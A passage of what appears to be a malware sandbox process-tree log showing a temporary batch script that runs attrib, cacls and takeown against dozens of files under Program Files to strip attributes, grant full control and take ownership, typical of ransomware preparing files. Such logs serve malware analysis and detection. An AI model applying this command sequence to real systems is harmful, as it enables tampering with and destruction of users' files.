  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\tipresx.dll.mui""
  2⤵
  PID:1196
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\tipresx.dll.mui"
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\tipresx.dll.mui"
    3⤵
    PID:240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui""
  2⤵
  PID:816
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui"
    3⤵
    - Views/modifies file attributes
    PID:1848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui"
    3⤵
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF""
  2⤵
  PID:108
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF"
    3⤵
    PID:844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF" /E /G Admin:F /C
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF"
    3⤵
    - Modifies file permissions
    PID:1220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.htm""
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.htm"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.htm" /E /G Admin:F /C
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.htm"
    3⤵
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Cave_Drawings.gif""
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Cave_Drawings.gif"
    3⤵
    PID:752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Cave_Drawings.gif" /E /G Admin:F /C
    3⤵
    PID:1360
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Cave_Drawings.gif"
    3⤵
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Connectivity.gif""
  2⤵
  PID:1444
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Connectivity.gif"
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Connectivity.gif" /E /G Admin:F /C
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Connectivity.gif"
    3⤵
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Dotted_Lines.emf""
  2⤵
  PID:1612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Dotted_Lines.emf"
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Dotted_Lines.emf" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Dotted_Lines.emf"
    3⤵
    - Modifies file permissions
    PID:836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.htm""
  2⤵
  PID:748
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.htm"
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.htm" /E /G Admin:F /C
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.htm"
    3⤵
    - Modifies file permissions
    PID:240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_1.emf""
  2⤵
  PID:1496
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_1.emf"
    3⤵
    - Views/modifies file attributes
    PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_1.emf" /E /G Admin:F /C
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_1.emf"
    3⤵
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_2.emf""
  2⤵
  PID:1632
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_2.emf"
    3⤵
    - Views/modifies file attributes
    PID:912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_2.emf" /E /G Admin:F /C
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_2.emf"
    3⤵
    PID:112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Graph.emf""
  2⤵
  PID:368
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Graph.emf"
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Graph.emf" /E /G Admin:F /C
    3⤵
    PID:888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Graph.emf"
    3⤵
    PID:1620
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Green Bubbles.htm""
  2⤵
  PID:1544
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Green Bubbles.htm"
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Green Bubbles.htm" /E /G Admin:F /C
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Green Bubbles.htm"
    3⤵
    PID:1336
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf""
  2⤵
  PID:2028
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf"
    3⤵
    PID:1360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf" /E /G Admin:F /C
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf"
    3⤵
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(inch).wmf""
  2⤵
  PID:1412
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(inch).wmf"
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(inch).wmf" /E /G Admin:F /C
    3⤵
    PID:1320
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(inch).wmf"
    3⤵
    PID:1444
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm""
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm"
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm" /E /G Admin:F /C
    3⤵
    PID:556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm"
    3⤵
    PID:1612
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Memo.emf""
  2⤵
  PID:1776
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Memo.emf"
    3⤵
    - Views/modifies file attributes
    PID:1464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Memo.emf" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Memo.emf"
    3⤵
    PID:748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Month_Calendar.emf""
  2⤵
  PID:568
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Month_Calendar.emf"
    3⤵
    PID:816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Month_Calendar.emf" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Month_Calendar.emf"
    3⤵
    PID:1660
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Music.emf""
  2⤵
  PID:912
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Music.emf"
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Music.emf" /E /G Admin:F /C
    3⤵
    PID:844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Music.emf"
    3⤵
    PID:1636
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Orange Circles.htm""
  2⤵
  PID:1512
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Orange Circles.htm"
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Orange Circles.htm" /E /G Admin:F /C
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Orange Circles.htm"
    3⤵
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm""
  2⤵
  PID:300
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm"
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm" /E /G Admin:F /C
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm"
    3⤵
    - Modifies file permissions
    PID:668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm""
  2⤵
  PID:1964
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm"
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm" /E /G Admin:F /C
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm"
    3⤵
    PID:752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Seyes.emf""
  2⤵
  PID:1232
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Seyes.emf"
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Seyes.emf" /E /G Admin:F /C
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Seyes.emf"
    3⤵
    PID:1112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shades of Blue.htm""
  2⤵
  PID:1948
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shades of Blue.htm"
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shades of Blue.htm" /E /G Admin:F /C
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shades of Blue.htm"
    3⤵
    PID:1584
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shorthand.emf""
  2⤵
  PID:1488
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shorthand.emf"
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shorthand.emf" /E /G Admin:F /C
    3⤵
    PID:524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shorthand.emf"
    3⤵
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Soft Blue.htm""
  2⤵
  PID:1920
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Soft Blue.htm"
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Soft Blue.htm" /E /G Admin:F /C
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Soft Blue.htm"
    3⤵
    PID:1904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.htm""
  2⤵
  PID:1216
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.htm"
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.htm" /E /G Admin:F /C
    3⤵
    PID:108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.htm"
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stucco.gif""
  2⤵
  PID:1852
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stucco.gif"
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stucco.gif" /E /G Admin:F /C
    3⤵
    PID:888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stucco.gif"
    3⤵
    PID:1448
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tiki.gif""
  2⤵
  PID:1916
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tiki.gif"
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tiki.gif" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tiki.gif"
    3⤵
    PID:1372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\To_Do_List.emf""
  2⤵
  PID:1124
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\To_Do_List.emf"
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\To_Do_List.emf" /E /G Admin:F /C
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\To_Do_List.emf"
    3⤵
    PID:2016
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Wrinkled_Paper.gif""
  2⤵
  PID:1924
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Wrinkled_Paper.gif"
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Wrinkled_Paper.gif" /E /G Admin:F /C
    3⤵
    PID:432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Wrinkled_Paper.gif"
    3⤵
    PID:1104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Services\verisign.bmp""
  2⤵
  PID:1960
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Services\verisign.bmp"
    3⤵
    PID:1196
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Services\verisign.bmp" /E /G Admin:F /C
    3⤵
    PID:556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Services\verisign.bmp"
    3⤵
    PID:2008
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\MSTTSLoc.dll.mui""
  2⤵
  PID:1628
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\MSTTSLoc.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:1848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\MSTTSLoc.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\MSTTSLoc.dll.mui"
    3⤵
    PID:2040
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\adojavas.inc""
  2⤵
  PID:1896
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\adojavas.inc"
    3⤵
    - Views/modifies file attributes
    PID:112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\adojavas.inc" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\adojavas.inc"
    3⤵
    PID:1892
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\adovbs.inc""
  2⤵
  PID:1888
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\adovbs.inc"
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\adovbs.inc" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\adovbs.inc"
    3⤵
    PID:676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui""
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:1336
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui"
    3⤵
    PID:1468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msado20.tlb""
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msado20.tlb"
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\msado20.tlb" /E /G Admin:F /C
    3⤵
    PID:904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msado20.tlb"
    3⤵
    PID:1968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msado21.tlb""
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msado21.tlb"
    3⤵
    PID:1444
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\msado21.tlb" /E /G Admin:F /C
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msado21.tlb"
    3⤵
    PID:760
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msado25.tlb""
  2⤵
  PID:884
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msado25.tlb"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\msado25.tlb" /E /G Admin:F /C
    3⤵
    PID:1068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msado25.tlb"
    3⤵
    PID:1696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msado26.tlb""
  2⤵
  PID:1584
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msado26.tlb"
    3⤵
    PID:240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\msado26.tlb" /E /G Admin:F /C
    3⤵
    PID:2008
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msado26.tlb"
    3⤵
    PID:1648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msado27.tlb""
  2⤵
  PID:1816
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msado27.tlb"
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\msado27.tlb" /E /G Admin:F /C
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msado27.tlb"
    3⤵
    PID:524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msado28.tlb""
  2⤵
  PID:1904
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msado28.tlb"
    3⤵
    PID:812
- - C:\Windows\SysWOW64\cacls.exe
